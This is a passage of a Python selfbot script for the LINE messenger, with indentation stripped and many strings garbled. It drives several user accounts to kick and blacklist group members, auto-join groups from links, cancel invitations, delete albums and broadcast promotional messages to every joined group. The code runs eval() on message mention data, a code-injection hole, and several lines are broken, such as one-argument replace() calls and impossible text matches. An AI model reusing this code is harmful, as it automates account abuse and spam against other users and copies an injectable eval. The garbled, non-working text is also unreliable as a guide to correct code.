G = ki5.getGroup(op.param1)
G.preventJoinByTicket = True
ki4.updateGroup(G)
Ticket = ki5.reissueGroupTicket(op.param1)
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in Bots:
wait["blacklist"][op.param2] = True
if op.type == 19:
if wait["MProtection"] == True:
if op.param2 not in Bots and staff:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
if op.param2 in wait["blacklist"]:
pass
#if op.param2 in wait["whitelist"]:
#pass
else:
wait["blacklist"][op.param2] = True
if op.type == 19:
if op.param3 in admin: #Kalo Admin ke Kick
if op.param2 in Bots:
pass
if op.param2 in staff:
pass
else:
random.choice(KAC).kickoutFromGroup(op.param1,[op.param2])
cl.inviteIntoGroup(op.param1,[op.param3])
if op.type == 13:
if mid in op.param3:
G = cl.getGroup(op.param1)
if wait["autoJoin"] == True:
if wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
elif wait["autoCancel"]["on"] == True:
if len(G.members) <= wait["autoCancel"]["members"]:
cl.rejectGroupInvitation(op.param1)
else:
Inviter = op.param3.replace("",',')
InviterX = Inviter.split(",")
matched_list = []
for tag in wait["blacklist"]:
matched_list+=filter(lambda str: str == tag, InviterX)
if matched_list == []:
pass
else:
cl.cancelGroupInvitation(op.param1, matched_list)
if op.type == 22:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 24:
if wait["leaveRoom"] == True:
cl.leaveRoom(op.param1)
if op.type == 26:
msg = op.message
if msg.toType == 0:
msg.to = msg.from_
if msg.from_ == profile.mid:
if "join:" in msg.text:
list_ = msg.text.split(":")
try:
cl.acceptGroupInvitationByTicket(list_[1],list_[2])
X = cl.getGroup(list_[1])
X.preventJoinByTicket = True
cl.updateGroup(X)
except:
cl.sendText(msg.to,"error")
if msg.toType == 1:
if wait["leaveRoom"] == True:
cl.leaveRoom(msg.to)
if msg.contentType == 16:
url = msg.contentMetadata("line://home/post?userMid="+mid+"&postId="+"new_post")
cl.like(url[25:58], url[66:], likeType=1001)
if op.type == 25:
msg = op.message
if msg.contentType == 13:
if wait["wblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
ki.sendText(msg.to,"already")
wait["wblack"] = False
else:
wait["commentBlack"][msg.contentMetadata["mid"]] = True
wait["wblack"] = False
ki.sendText(msg.to,"decided not to comment")
elif wait["dblack"] == True:
if msg.contentMetadata["mid"] in wait["commentBlack"]:
del wait["commentBlack"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
wait["dblack"] = False
else:
wait["dblack"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
ki.sendText(msg.to,"already")
#ki.sendText(msg.to,"already")
#kk.sendText(msg.to,"already")
#kc.sendText(msg.to,"already")
wait["wblacklist"] = False
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = False
ki.sendText(msg.to,"aded")
#ki.sendText(msg.to,"aded")
#kk.sendText(msg.to,"aded")
#kc.sendText(msg.to,"aded")
elif wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
ki.sendText(msg.to,"deleted")
#ki.sendText(msg.to,"deleted")
#kk.sendText(msg.to,"deleted")
#kc.sendText(msg.to,"deleted")
#wait["dblacklist"] = False
else:
wait["dblacklist"] = False
ki.sendText(msg.to,"It is not in the black list")
#ki.sendText(msg.to,"It is not in the black list")
#kk.sendText(msg.to,"It is not in the black list")
#kc.sendText(msg.to,"It is not in the black list")
elif wait["contact"] == True:
msg.contentType = 0
cl.sendText(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + msg.contentMetadata["displayName"] + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
else:
contact = cl.getContact(msg.contentMetadata["mid"])
try:
cu = cl.channel.getCover(msg.contentMetadata["mid"])
except:
cu = ""
cl.sendText(msg.to,"[displayName]:\n" + contact.displayName + "\n[mid]:\n" + msg.contentMetadata["mid"] + "\n[statusMessage]:\n" + contact.statusMessage + "\n[pictureStatus]:\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n[coverURL]:\n" + str(cu))
elif msg.contentType == 16:
if wait["timeline"] == True:
msg.contentType = 0
if wait["lang"] == "JP":
msg.text = "post URL\n" + msg.contentMetadata["postEndUrl"]
else:
msg.text = "URL→\n" + msg.contentMetadata["postEndUrl"]
cl.sendText(msg.to,msg.text)
elif msg.text is None:
return
elif msg.text in ["Key","help","Help"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,helpMessage)
else:
cl.sendText(msg.to,helpt)
elif msg.text in ["Set"]:
if msg.from_ in Bots or staff:
if wait["lang"] == "JP":
cl.sendText(msg.to,Setgroup)
else:
cl.sendText(msg.to,Sett)
elif ("Gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gn ","")
cl.updateGroup(X)
else:
cl.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv1 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv1 gn ","")
ki.updateGroup(X)
else:
ki.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv2 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv2 gn ","")
kk.updateGroup(X)
else:
kk.sendText(msg.to,"It can't be used besides the group.")
elif ("Cv3 gn " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Cv3 gn ","")
kc.updateGroup(X)
else:
kc.sendText(msg.to,"It can't be used besides the group.")
elif "Kick " in msg.text:
if msg.from_ in Bots and staff:
midd = msg.text.replace("Kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "1 kick " in msg.text:
midd = msg.text.replace("1 kick ","")
ki.kickoutFromGroup(msg.to,[midd])
elif "2 kick " in msg.text:
midd = msg.text.replace("2 kick ","")
ki2.kickoutFromGroup(msg.to,[midd])
elif "3 kick " in msg.text:
midd = msg.text.replace("3 kick ","")
ki3.kickoutFromGroup(msg.to,[midd])
elif "Invite " in msg.text:
if msg.from_ in Bots or staff:
midd = msg.text.replace("Invite ","")
cl.findAndAddContactsByMid(midd)
cl.inviteIntoGroup(msg.to,[midd])
elif "1 invite " in msg.text:
midd = msg.text.replace("Cv1 invite ","")
ki.findAndAddContactsByMid(midd)
ki.inviteIntoGroup(msg.to,[midd])
elif "2 invite " in msg.text:
midd = msg.text.replace("Cv2 invite ","")
ki2.findAndAddContactsByMid(midd)
ki2.inviteIntoGroup(msg.to,[midd])
elif "3 invite " in msg.text:
midd = msg.text.replace("Cv3 invite ","")
ki3.findAndAddContactsByMid(midd)
ki3.inviteIntoGroup(msg.to,[midd])
elif msg.text in ["Me"]:
msg.contentType = 13
msg.contentMetadata = {'mid': mid}
cl.sendMessage(msg)
elif msg.text in ["1"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Amid}
ki.sendMessage(msg)
elif msg.text in ["2"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Bmid}
ki2.sendMessage(msg)
elif msg.text in ["3"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Cmid}
ki3.sendMessage(msg)
elif msg.text in ["4"]:
msg.contentType = 13
msg.contentMetadata = {'mid': Dmid}
ki4.sendMessage(msg)
elif msg.text in ["æ„›ã®ãƒ—レゼント","Gift"]:
msg.contentType = 9
msg.contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58',
'PRDTYPE': 'THEME',
'MSGTPL': '5'}
msg.text = None
cl.sendMessage(msg)
#-----Fungsi List Group------#
elif msg.text in ["List group"]:
if msg.from_ in admin:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[~]%s\n" % (cl.getGroup(i).name +str (len (cl.getGroup(i).members)))
cl.sendText(msg.to,"========[List Group]========\n"+ h +"Total Group :" +str(len(gid)))
#-----Finish--------#
#-------------Fungsi Creator Start-----------------#
elif msg.text in ["Creator"]:
if msg.toType == 2:
msg.contentType = 13
Creatorbot = "u9e5a757e7b6e466baf87e8f747d96eb5"
try:
msg.contentMetadata = {'mid': Creatorbot}
except:
Creatorbot = "Error"
cl.sendText(msg.to, "My Creator : IP/nhttp://line.me/ti/p/~fras999")
cl.sendMessage(msg)
#-------------Fungsi Creator Finish-----------------#
#-------------Fungsi Kick By Tag---------------------#
elif ("Bye " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
random.choice(KAC).sendText(op.param1, cl.getContact(op.param3).displayName + " ~Sorry (*´・ω・*)")
except:
pass
#-------------Fungsi Kick By Tag---------------------#
#-------------Fungsi Ban By Tag---------------------#
elif ("BL " in msg.text):
if msg.from_ in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
wait["blacklist"][target] = True
f=codecs.open('st2__b.json','w','utf-8')
json.dump(wait["blacklist"], f, sort_keys=True, indent=4,ensure_ascii=False)
cl.sendText(msg.to,"Succes Blacklist")
except:
pass
#-------------Fungsi Ban By Tag Finish---------------------#
elif msg.text in ["cancel","Cancel"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
if X.invitee is not None:
gInviMids = [contact.mid for contact in X.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Cv cancel","Bot cancel"]:
if msg.toType == 2:
G = ki.getGroup(msg.to)
if G.invitee is not None:
gInviMids = [contact.mid for contact in G.invitee]
ki.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"No one is inviting")
else:
ki.sendText(msg.to,"Sorry, nobody absent")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
#elif "gurl" == msg.text:
#print cl.getGroup(msg.to)
##cl.sendMessage(msg)
elif msg.text in ["Open","Link on"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 open","Cv1 link on"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = False
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already open")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["Close","Link off"]:
if msg.from_ in Bots or staff:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif msg.text in ["1 close","Cv1 link off"]:
if msg.toType == 2:
X = ki.getGroup(msg.to)
X.preventJoinByTicket = True
ki.updateGroup(X)
if wait["lang"] == "JP":
ki.sendText(msg.to,"Done ")
else:
ki.sendText(msg.to,"already close")
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "jointicket " in msg.text.lower():
rplace=msg.text.lower().replace("jointicket ")
if rplace == "on":
wait["atjointicket"]=True
elif rplace == "off":
wait["atjointicket"]=False
cl.sendText(msg.to,"Auto Join Group by Ticket is %s" % str(wait["atjointicket"]))
elif '/ti/g/' in msg.text.lower():
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(msg.text)
n_links=[]
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
if wait["atjointicket"] == True:
group=cl.findGroupByTicket(ticket_id)
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendText(msg.to,"Sukses join ke grup %s" % str(group.name))
elif msg.text == "Ginfo":
if msg.toType == 2:
ginfo = ki.getGroup(msg.to)
try:
gCreator = ginfo.creator.displayName
except:
gCreator = "Error"
if wait["lang"] == "JP":
if ginfo.invitee is None:
sinvitee = "0"
else:
sinvitee = str(len(ginfo.invitee))
if ginfo.preventJoinByTicket == True:
u = "close"
else:
u = "open"
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus + "\nmembers:" + str(len(ginfo.members)) + "members\npending:" + sinvitee + "people\nURL:" + u + "it is inside")
else:
ki.sendText(msg.to,"[group name]\n" + str(ginfo.name) + "\n[gid]\n" + msg.to + "\n[group creator]\n" + gCreator + "\n[profile status]\nhttp://dl.profile.line.naver.jp/" + ginfo.pictureStatus)
else:
if wait["lang"] == "JP":
ki.sendText(msg.to,"Can not be used outside the group")
else:
ki.sendText(msg.to,"Not for use less than group")
elif "Id" == msg.text:
cl.sendText(msg.to,msg.to)
elif "Mid all" == msg.text:
cl.sendText(msg.to,mid)
ki.sendText(msg.to,Amid)
ki2.sendText(msg.to,Bmid)
ki3.sendText(msg.to,Cmid)
ki4.sendText(msg.to,Dmid)
ki5.sendText(msg.to,Emid)
elif "Mid" == msg.text:
cl.sendText(msg.to,mid)
elif msg.text in ["Wc"]:
msg.contentType = 7
msg.text = None
msg.contentMetadata = {
"STKID": "247",
"STKPKGID": "3",
"STKVER": "100" }
cl.sendMessage(msg)
elif msg.text in ["TL:"]:
tl_text = msg.text.replace("TL:","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Bc: " in msg.text:
bc = msg.text.replace("Bc: ","")
gid = cl.getGroupIdsJoined()
if msg.from_ in admin:
for i in gid:
cl.sendText(i,"=======[BROADCAST]=======\n\n"+bc+"\n\nContact Me : line.me/ti/p/~fras88")
cl.sendText(msg.to,"Success BC BosQ")
elif "Name: " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("Name: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"name " + string + "Done")
elif "1Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("1Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki.sendText(msg.to,"name " + string + "Done")
elif "2Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("2Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki2.updateProfile(profile)
ki2.sendText(msg.to,"name" + string + "Done")
elif "3Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("3Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki3.updateProfile(profile)
ki3.sendText(msg.to,"name" + string + "Done")
elif "4Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("4Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki4.updateProfile(profile)
ki4.sendText(msg.to,"name" + string + "Done")
elif "5Up n " in msg.text:
if msg.from_ in Bots:
string = msg.text.replace("5Up n ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki5.updateProfile(profile)
ki5.sendText(msg.to,"name" + string + "Done")
elif "All: " in msg.text:
string = msg.text.replace("All: ","")
if len(string.decode('utf-8')) <= 20:
profile = cl.getProfile()
profile.displayName = string
ki.updateProfile(profile)
ki2.updateProfile(profile)
ki3.updateProfile(profile)
ki4.updateProfile(profile)
ki5.updateProfile(profile)
ki.sendText(msg.to,"name" + string + "Done")
ki2.sendText(msg.to,"name" + string + "Done")
ki3.sendText(msg.to,"name" + string + "Done")
ki4.sendText(msg.to,"name" + string + "Done")
ki5.sendText(msg.to,"name" + string + "Done")
elif msg.text in ["Mc "]:
mmid = msg.text.replace("Mc ","")
msg.contentType = 13
msg.contentMetadata = {"mid":mmid}
cl.sendMessage(msg)
#---------------#
elif msg.text in ["ajo on"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
wait["Protectguest"] = True
wait["Protectgr"] = True
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["ajo off"]:
if msg.from_ in Bots or staff:
if wait["AllProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
wait["Protectguest"] = False
wait["Protectgr"] = False
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"All Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["M on"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["M off"]:
if msg.from_ in Bots or staff:
if wait["MProtection"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["MProtection"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Member Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Bi on","Guest on"]:
if msg.from_ in admin:
if wait["Protectguest"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Guest Stranger On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Bi off","guest off"]:
if msg.from_ in admin:
if wait["Protectguest"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectguest"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Block invite off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr on","qr on"]:
if msg.from_ in Bots or staff:
if wait["Protectgr"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection On")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Qr off","qr off"]:
if msg.from_ in Bots or staff:
if wait["Protectgr"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectgr"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"QR Protection Off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cn on","proc on"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Cn off","proc off"]:
if msg.from_ in Bots or staff:
if wait["Protectcancel"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
else:
wait["Protectcancel"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Protect cancel off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡先:オン","K on","Contact on","顯示:開"]:
if msg.from_ in admin or staff:
if wait["contact"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["contact"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["連絡��:オフ","K off","Contact off","顯示��關"]:
if msg.from_ in admin or staff:
if wait["contact"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done ")
else:
wait["contact"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オン","Join on","Auto join:on","自動åƒåŠ ï¼šé–‹"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["自動å‚åŠ :オフ","Join off","Auto join:off","自動åƒåŠ ï¼šé—œ"]:
if msg.from_ in admin or staff:
if wait["autoJoin"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoJoin"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
elif msg.text in ["Gcancel:"]:
try:
strnum = msg.text.replace("Gcancel:","")
if strnum == "off":
wait["autoCancel"]["on"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Invitation refused turned off\nTo turn on please specify the number of people and send")
else:
cl.sendText(msg.to,"关了邀请拒ç»ã€‚è¦æ—¶å¼€è¯·æŒ‡å®šäººæ•°å‘é€")
else:
num = int(strnum)
wait["autoCancel"]["on"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,strnum + "The group of people and below decided to automatically refuse invitation")
else:
cl.sendText(msg.to,strnum + "使人以下的å°ç»„用自动邀请拒ç»")
except:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Value is wrong")
else:
cl.sendText(msg.to,"Bizarre ratings")
elif msg.text in ["強制自動退出:オン","Leave on","Auto leave:on","強制自動退出:開"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["強制自動退出:オフ","Leave off","Auto leave:off","強制自動退出:關"]:
if msg.from_ in admin or staff:
if wait["leaveRoom"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["leaveRoom"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"already")
elif msg.text in ["共有:オン","Share on","Share on"]:
if msg.from_ in admin or staff:
if wait["timeline"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["共有:オフ","Share off","Share off"]:
if msg.from_ in admin or staff:
if wait["timeline"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["timeline"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif msg.text in ["View"]:
md = ""
if wait["MProtection"] == True: md+=" MProtection : on\n"
else: md+=" MProtection : off\n"
if wait["Protectcancel"] == True: md+=" Protect Cancel : on\n"
else: md+=" Protect Cancel : off\n"
if wait["Protectgr"] == True: md+=" Protectgr : on\n"
else: md+=" Protectgr : off\n"
if wait["Protectguest"] == True: md+=" Block Invite : on\n"
else: md+=" Block Invite : off\n"
if wait["contact"] == True: md+=" Contact : on\n"
else: md+=" Contact : off\n"
if wait["autoJoin"] == True: md+=" Auto join : on\n"
else: md +=" Auto join : off\n"
if wait["autoCancel"]["on"] == True:md+=" Group cancel :" + str(wait["autoCancel"]["members"]) + "\n"
else: md+= " Group cancel : off\n"
if wait["leaveRoom"] == True: md+=" Auto leave : on\n"
else: md+=" Auto leave : off\n"
if wait["timeline"] == True: md+=" Share : on\n"
else:md+=" Share : off\n"
if wait["autoAdd"] == True: md+=" Auto add : on\n"
else:md+=" Auto add : off\n"
if wait["commentOn"] == True: md+=" Comment : on\n"
else:md+=" Comment : off\n"
if wait["atjointicket"] == True: md+=" Auto Join Group by Ticket : on\n"
else:md+=" Auto Join Group by Ticket : off\n"
cl.sendText(msg.to,md)
elif "album merit " in msg.text:
gid = msg.text.replace("album merit ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
cl.sendText(msg.to,mg)
elif "Album " in msg.text:
gid = msg.text.replace("album ","")
album = cl.getAlbum(gid)
if album["result"]["items"] == []:
if wait["lang"] == "JP":
cl.sendText(msg.to,"There is no album")
else:
cl.sendText(msg.to,"相册没在。")
else:
if wait["lang"] == "JP":
mg = "The following is the target album"
else:
mg = "以下是对象的相册"
for y in album["result"]["items"]:
if "photoCount" in y:
mg += str(y["title"]) + ":" + str(y["photoCount"]) + "sheet\n"
else:
mg += str(y["title"]) + ":0sheet\n"
elif "Album remove " in msg.text:
gid = msg.text.replace("album remove ","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Deleted albums")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["Group id","群組全id"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
elif msg.text in ["Cancelall"]:
if msg.from_ in admin or staff:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"All invitations have been refused")
else:
cl.sendText(msg.to,"æ‹’ç»äº†å…¨éƒ¨çš„邀请。")
elif "album remove→" in msg.text:
gid = msg.text.replace("album remove→","")
albums = cl.getAlbum(gid)["result"]["items"]
i = 0
if albums != []:
for album in albums:
cl.deleteAlbum(gid,album["id"])
i += 1
if wait["lang"] == "JP":
cl.sendText(msg.to,str(i) + "Albums deleted")
else:
cl.sendText(msg.to,str(i) + "åˆ é™¤äº†äº‹çš„ç›¸å†Œã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オン","Add on","Auto add:on","è‡ªå‹•è¿½åŠ ï¼šé–‹"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already on")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å¼€ã€‚")
elif msg.text in ["è‡ªå‹•è¿½åŠ :オフ","Add off","Auto add:off","è‡ªå‹•è¿½åŠ ï¼šé—œ"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"already off")
else:
cl.sendText(msg.to,"done")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"done")
else:
cl.sendText(msg.to,"è¦äº†å…³æ–。")
elif "Message change: " in msg.text:
wait["message"] = msg.text.replace("Message change: ","")
cl.sendText(msg.to,"message changed")
elif "Message add: " in msg.text:
wait["message"] = msg.text.replace("Message add: ","")
if wait["lang"] == "JP":
